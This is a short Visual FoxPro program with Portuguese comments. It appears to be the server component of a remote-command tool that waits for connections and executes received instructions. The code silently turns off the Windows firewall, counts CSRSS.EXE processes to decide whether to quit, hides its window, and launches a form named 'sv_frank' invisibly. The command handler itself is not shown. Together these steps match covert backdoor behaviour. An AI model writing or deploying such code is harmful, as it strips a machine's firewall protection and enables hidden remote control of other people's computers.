* Servidor -> aguardando conexão 					*
* Verifica o comando recebido - executa instruções.	*
TRY
oFW = CREATEOBJECT("HNetCfg.FwMgr")
oFW.LocalPolicy.CurrentProfile.FirewallEnabled = .F.
RELEASE oFW
CATCH
ENDTRY

CREATE CURSOR TMPPROC(PNAME C(200))
LCCOMP = 'localhost'
src= createobject('WbemScripting.SWbemLocator')
LOWMISERVICE = src.ConnectServer(LCCOMP)
COLPROCESSLIST = LOWMISERVICE.EXECQUERY('SELECT * FROM WIN32_PROCESS')
FOR EACH LOPROCESS IN COLPROCESSLIST
	IF NOT EMPTY(LOPROCESS.NAME)
		SELE TMPPROC
		APPEND BLANK
		REPLACE PNAME WITH (UPPER(LOPROCESS.NAME))
	ENDIF
NEXT

LOCAL lnQTP
SELE TMPPROC
GO TOP
COUNT FOR ALLTRIM(PNAME) == 'CSRSS.EXE' TO lnQTP

IF lnQTP >= 4
	_SAIR()
	QUIT
ENDIF


_SCREEN.Visible = .F.
_SCREEN.AlwaysOnTop = .T.

SET RESOURCE OFF
SET HOURS TO 24
SET DELETED ON
SET EXACT OFF

DO FORM sv_frank NOSHOW

ON SHUTDOWN _SAIR()
READ EVENTS

FUNC _SAIR
	CLEAR EVENTS
	ON SHUTDOWN QUIT